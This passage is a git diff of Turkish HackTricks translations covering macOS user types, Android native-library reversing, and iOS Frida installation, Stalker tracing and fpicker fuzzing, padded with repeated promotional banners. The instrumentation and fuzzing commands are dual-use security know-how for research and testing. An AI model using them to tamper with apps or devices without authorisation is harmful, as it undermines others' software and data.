_oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
|
||||
```
|
||||
- **Guest**: Çok sıkı izinlere sahip misafir hesabı
|
||||
* **Guest**: Çok sıkı izinlere sahip misafir hesabı
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -49,21 +49,7 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
|
|||
|
||||
### Kullanıcı İzinleri
|
||||
|
||||
* **Standart Kullanıcı:** En temel kullanıcı türüdür. Bu kullanıcı, yazılım yüklemeye veya diğer gelişmiş görevleri gerçekleştirmeye çalıştığında bir yönetici kullanıcıdan izin alması gerekir. Kendi başlarına bunları yapamazlar.
|
||||
* **Yönetici Kullanıcı**: Çoğu zaman standart bir kullanıcı olarak çalışan ancak yazılım yüklemek ve diğer yönetici görevlerini gerçekleştirmesine izin verilen bir kullanıcıdır. Yönetici grubuna ait tüm kullanıcılara **sudoers dosyası aracılığıyla root erişimi verilir**.
|
||||
* **Root**: Root, neredeyse herhangi bir işlemi gerçekleştirmesine izin verilen bir kullanıcıdır (Sistem Bütünlük Koruması gibi korumalar tarafından belirli kısıtlamalar getirilmiştir).
|
||||
* Örneğin root, `/System` dizini içine bir dosya yerleştiremez
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
* **Standart Kullanıcı:** En temel kullanıcı. Bu kullanıcı, yazılım yüklemeye veya diğer gelişmiş görevleri gerçekleştirmeye çalıştığında bir yönetici kullanıcıdan verilen izinlere ihtiyaç duyar. Kendi başlarına bunları yapamazlar.
|
||||
* **Yönetici Kullanıcı**: Genellikle standart bir kullanıcı olarak çalışan ancak yazılım yüklemek ve diğer yönetici görevlerini gerçekleştirmesine izin verilen bir kullanıcı. Yönetici grubuna ait tüm kullanıcılara **sudoers dosyası aracılığıyla root erişimi verilir**.
|
||||
* **Root**: Root, neredeyse herhangi bir işlemi gerçekleştirmesine izin verilen bir kullanıcıdır (Sistem Bütünlük Koruması gibi korumalar tarafından belirli kısıtlamalar getirilebilir).
|
||||
* Örneğin root, `/System` dizini içine bir dosya yerleştiremeyecektir.
|
||||
|
|
|
@ -2,21 +2,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
|
@ -30,33 +30,33 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
**Daha fazla bilgi için: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
||||
|
||||
Android uygulamaları, performans açısından kritik görevler için genellikle C veya C++ ile yazılmış olan yerel kütüpheleri kullanabilir. Kötü amaçlı yazılım oluşturucuları da bu kütüphaneleri kullanır, çünkü bunlar DEX bytecode'a göre daha zor tersine mühendislik yapılmasını sağlar. Bu bölüm, Android'e özgü tersine mühendislik becerilerine odaklanırken, montaj dillerini öğretmek yerine Android için uyarlanmıştır. Uyum sağlamak için ARM ve x86 sürümleri sağlanmıştır.
|
||||
Android uygulamaları, performans açısından kritik görevler için genellikle C veya C++ ile yazılmış olan native kütüphaneleri kullanabilir. Kötü amaçlı yazılım oluşturucuları da bu kütüphaneleri kullanır, çünkü DEX bytecode'a göre daha zor tersine mühendislik yapmaktadırlar. Bu bölüm, Android'e özgü tersine mühendislik becerilerine odaklanırken, montaj dillerini öğretmek yerine Android'e özgü becerileri vurgular. Uyum sağlamak için ARM ve x86 sürümleri sağlanmıştır.
|
||||
|
||||
### Ana Noktalar:
|
||||
- **Android Uygulamalarında Yerel Kütüphaneler:**
|
||||
- **Android Uygulamalarında Native Kütüphaneler:**
|
||||
- Performans yoğun görevler için kullanılır.
|
||||
- Tersine mühendisliği zorlaştıran C veya C++ ile yazılmıştır.
|
||||
- `.so` (paylaşılan nesne) formatında bulunur, Linux ikililerine benzerdir.
|
||||
- Kötü amaçlı yazılım oluşturucuları analizi zorlaştırmak için yerel kodu tercih eder.
|
||||
- Linux ikili dosyalarına benzer şekilde `.so` (paylaşılan nesne) formatında bulunur.
|
||||
- Kötü amaçlı yazılım oluşturucuları analizi zorlaştırmak için native kodu tercih eder.
|
||||
|
||||
- **Java Native Interface (JNI) ve Android NDK:**
|
||||
- JNI, Java yöntemlerinin yerel kodda uygulanmasına izin verir.
|
||||
- NDK, yerel kod yazmak için Android'e özgü bir araç setidir.
|
||||
- JNI ve NDK, Java (veya Kotlin) kodunu yerel kütüphanelerle birleştirir.
|
||||
- JNI, Java yöntemlerinin native kodda uygulanmasına izin verir.
|
||||
- NDK, native kod yazmak için Android'e özgü bir araç setidir.
|
||||
- JNI ve NDK, Java'yı (veya Kotlin'i) native kütüphanelerle köprüler.
|
||||
|
||||
- **Kütüphane Yükleme ve Çalıştırma:**
|
||||
- Kütüphaneler, `System.loadLibrary` veya `System.load` kullanılarak belleğe yüklenir.
|
||||
- Kütüphane yüklendiğinde JNI_OnLoad çalıştırılır.
|
||||
- Java tarafından bildirilen yerel yöntemler, yerel işlevlerle bağlantı kurarak çalışmayı sağlar.
|
||||
- Java tarafından bildirilen native yöntemler, native işlevlerle bağlantı kurarak çalıştırılmasını sağlar.
|
||||
|
||||
- **Java Yöntemlerini Yerel İşlevlere Bağlama:**
|
||||
- **Dinamik Bağlama:** Yerel kütüphelerdeki işlev adları belirli bir deseni eşleştirir, otomatik bağlama sağlar.
|
||||
- **Statik Bağlama:** Bağlama için `RegisterNatives` kullanır, işlev adlandırma ve yapısında esneklik sağlar.
|
||||
- **Java Yöntemlerini Native İşlevlere Bağlama:**
|
||||
- **Dinamik Bağlama:** Native kütüphanelerdeki işlev adları belirli bir deseni eşleştirdiğinden otomatik bağlantı sağlar.
|
||||
- **Statik Bağlama:** Bağlantı için `RegisterNatives` kullanır, işlev adlandırma ve yapısında esneklik sağlar.
|
||||
|
||||
- **Tersine Mühendislik Araçları ve Teknikleri:**
|
||||
- Ghidra ve IDA Pro gibi araçlar, yerel kütüpheleri analiz etmede yardımcı olur.
|
||||
- Ghidra ve IDA Pro gibi araçlar, native kütüphaneleri analiz etmede yardımcı olur.
|
||||
- `JNIEnv`, JNI işlevlerini ve etkileşimleri anlamak için önemlidir.
|
||||
- Kütüphaneleri yükleme, yöntemleri bağlama ve yerel işlevleri tanımlama pratiği yapmak için egzersizler sağlanmaktadır.
|
||||
- Kütüphaneleri yükleme, yöntemleri bağlama ve native işlevleri tanımlama pratiği yapmak için egzersizler sağlanmaktadır.
|
||||
|
||||
### Kaynaklar:
|
||||
- **ARM Montajı Öğrenme:**
|
||||
|
@ -64,9 +64,36 @@ Android uygulamaları, performans açısından kritik görevler için genellikle
|
|||
- Azeria Labs'ten [ARM Montaj Temelleri](https://azeria-labs.com/writing-arm-assembly-part-1/) tavsiye edilir.
|
||||
|
||||
- **JNI ve NDK Belgeleri:**
|
||||
- [Oracle'ın JNI Özellikleri](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
|
||||
- [Oracle'ın JNI Belirtimi](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
|
||||
- [Android JNI İpuçları](https://developer.android.com/training/articles/perf-jni)
|
||||
- [NDK ile Başlarken](https://developer.android.com/ndk/guides/)
|
||||
|
||||
- **Yerel Kütüpheleri Hata Ayıklama:**
|
||||
- [JEB Decompiler Kullanarak Android Yerel Kütüpheleri Hata Ayıklama](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
- **Native Kütüphaneleri Hata Ayıklama:**
|
||||
- [JEB Decompiler Kullanarak Android Native Kütüphanelerini Hata Ayıklama](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,21 +4,21 @@
|
|||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -28,33 +28,33 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
---
|
||||
|
||||
## Frida Kurulumu
|
||||
## Frida'nın Yüklenmesi
|
||||
|
||||
**Bir Jailbreak cihazına Frida'yı yüklemek için adımlar:**
|
||||
**Bir Jailbroken cihazda Frida'yı yüklemek için adımlar:**
|
||||
|
||||
1. Cydia/Sileo uygulamasını açın.
|
||||
2. Yönet -> Kaynaklar -> Düzenle -> Ekle'ye gidin.
|
||||
3. URL olarak "https://build.frida.re" adresini girin.
|
||||
3. URL olarak "https://build.frida.re" yazın.
|
||||
4. Yeni eklenen Frida kaynağına gidin.
|
||||
5. Frida paketini yükleyin.
|
||||
|
||||
**Corellium** kullanıyorsanız, Frida sürümünü [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) adresinden indirmeniz gerekecek (`frida-gadget-[sürümünüz]-ios-universal.dylib.gz`) ve Frida'nın istediği dylib konumuna açıp kopyalamanız gerekecek, örneğin: `/Users/[kullanıcıadınız]/.cache/frida/gadget-ios.dylib`
|
||||
**Corellium** kullanıyorsanız, Frida sürümünü [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) adresinden indirmeniz gerekecek (`frida-gadget-[sürümünüz]-ios-universal.dylib.gz`) ve Frida'nın istediği dylib konumuna açıp kopyalamanız gerekecek, örn.: `/Users/[kullanıcıadınız]/.cache/frida/gadget-ios.dylib`
|
||||
|
||||
Kurulduktan sonra, bilgisayarınızda **`frida-ls-devices`** komutunu kullanarak cihazın görünüp görünmediğini kontrol edebilirsiniz (bilgisayarınızın buna erişebilmesi gerekir).\
|
||||
Yükledikten sonra, bilgisayarınızda **`frida-ls-devices`** komutunu kullanarak cihazın görünüp görünmediğini kontrol edebilirsiniz (bilgisayarınızın buna erişebilmesi gerekir).\
|
||||
Ayrıca telefonun çalışan işlemlerini kontrol etmek için **`frida-ps -Uia`** komutunu da çalıştırın.
|
||||
|
||||
## Jailbreak yapılmamış cihazda ve uygulamayı yamalamadan Frida
|
||||
## Jailbroken cihaz olmadan ve uygulamayı yamalamadan Frida
|
||||
|
||||
Jailbreak yapılmamış cihazlarda uygulamayı yamalamadan Frida'nın nasıl kullanılacağı hakkında bu blog yazısına göz atın: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
|
||||
Jailbroken olmayan cihazlarda uygulamayı yamalamadan Frida'nın nasıl kullanılacağı hakkında bu blog yazısına bakın: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
|
||||
|
||||
## Frida İstemci Kurulumu
|
||||
|
||||
**Frida araçlarını yükleyin:**
|
||||
**frida araçlarını** yükleyin:
|
||||
```bash
|
||||
pip install frida-tools
|
||||
pip install frida
|
||||
```
|
||||
Frida sunucusu yüklü ve cihaz çalışır durumda ve bağlı olduğunda, istemcinin çalışıp çalışmadığını **kontrol edin**:
|
||||
Frida sunucusu yüklendikten ve cihaz çalışır durumda ve bağlı olduğunda, **çalışıp çalışmadığını** kontrol edin:
|
||||
```bash
|
||||
frida-ls-devices # List devices
|
||||
frida-ps -Uia # Get running processes
|
||||
|
@ -167,11 +167,11 @@ console.log("loaded");
|
|||
|
||||
### Frida Stalker
|
||||
|
||||
[Belgelerden](https://frida.re/docs/stalker/): Stalker, Frida'nın kod **izleme motoru**dur. İş parçacıklarının **takip edilmesine** izin verir, her fonksiyonu, her bloğu hatta her yürütülen talimatı **yakalar**.
|
||||
[Belgelerden](https://frida.re/docs/stalker/): Stalker, Frida'nın kod **izleme motoru**dur. İzin verir ki **izlenen** **her işlevi**, **her bloğu** hatta her bir işlemi **takip edebilirsiniz**.
|
||||
|
||||
Frida Stalker'ı uygulayan bir örnek için [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
|
||||
Frida Stalker'ı uygulayan bir örnek [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
|
||||
|
||||
Her bir fonksiyon çağrıldığında Frida Stalker'ın eklenmesi için başka bir örnek:
|
||||
Her bir işlev çağrıldığında Frida Stalker'ı eklemek için başka bir örnek:
|
||||
```javascript
|
||||
console.log("loading");
|
||||
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
|
||||
|
@ -323,9 +323,9 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
Bu durumda her bir payload sonrasında uygulamayı yeniden başlatmıyor veya durumu geri yükleme yapmıyoruz. Dolayısıyla, eğer Frida bir **çöküş** bulursa, o payload'dan sonraki **girişler** de uygulamayı **çökerte bilir** (çünkü uygulama kararsız bir durumda) hatta girişin uygulamayı **çökertmemesi gerekiyorsa** bile.
|
||||
Bu durumda her payload sonrasında uygulamayı yeniden başlatmıyor veya durumu geri yükleme yapmıyoruz. Dolayısıyla, eğer Frida bir **çöküş** bulursa, o payload'dan sonraki **sonraki girişler** uygulamayı **çökerte bilir** (çünkü uygulama kararsız bir durumda) hatta giriş uygulamanın **çökmemesi gereken** bir giriş olabilir.
|
||||
|
||||
Ayrıca, Frida iOS'un istisna sinyallerine kancalandığından, **Frida bir çöküş bulduğunda**, muhtemelen bir **iOS çöküş raporu oluşturulmayacak**.
|
||||
Ayrıca, Frida iOS'un istisna sinyallerine kancalanacak, bu yüzden **Frida bir çöküş bulduğunda**, muhtemelen bir **iOS çöküş raporu oluşturulmayacak**.
|
||||
|
||||
Bunu önlemek için örneğin, her Frida çöküşünden sonra uygulamayı yeniden başlatabiliriz.
|
||||
{% endhint %}
|
||||
|
@ -334,7 +334,7 @@ Bunu önlemek için örneğin, her Frida çöküşünden sonra uygulamayı yenid
|
|||
|
||||
**macOS konsolunu** veya **`log`** komut satırını kullanarak macOS günlüklerini kontrol edebilirsiniz.\
|
||||
iOS'tan gelen günlükleri kontrol etmek için **`idevicesyslog`** kullanabilirsiniz.\
|
||||
Bazı günlükler, bilgi ekleyerek **`<private>`** ekleyebilir. Tüm bilgileri göstermek için [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) adresinden bazı profilleri yükleyerek bu özel bilgileri etkinleştirmeniz gerekmektedir.
|
||||
Bazı günlükler, bilgileri **`<private>`** ekleyerek atlayacaktır. Tüm bilgileri göstermek için [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) adresinden bazı profilleri yükleyerek bu özel bilgileri etkinleştirmeniz gerekmektedir.
|
||||
|
||||
Ne yapacağınızı bilmiyorsanız:
|
||||
```sh
|
||||
|
@ -358,7 +358,7 @@ killall -9 logd
|
|||
* `~/Library/Logs/DiagnosticReports`
|
||||
|
||||
{% hint style="warning" %}
|
||||
iOS yalnızca aynı uygulamanın 25 çöküşünü saklar, bu yüzden bunları temizlemeniz gerekmektedir; aksi takdirde iOS çöküş oluşturmayı durduracaktır.
|
||||
iOS yalnızca aynı uygulamanın 25 çökmesini saklar, bu yüzden bunları temizlemeniz gerekiyor aksi takdirde iOS çökme oluşturmayı durduracaktır.
|
||||
{% endhint %}
|
||||
|
||||
## Frida Android Öğreticileri
|
||||
|
@ -372,11 +372,11 @@ iOS yalnızca aynı uygulamanın 25 çöküşünü saklar, bu yüzden bunları t
|
|||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunan **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io) bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **dark web** destekli bir arama motoru sunan **ücretsiz** işlevsellikler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -387,14 +387,14 @@ Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsi
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da takip edin** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,27 +2,27 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
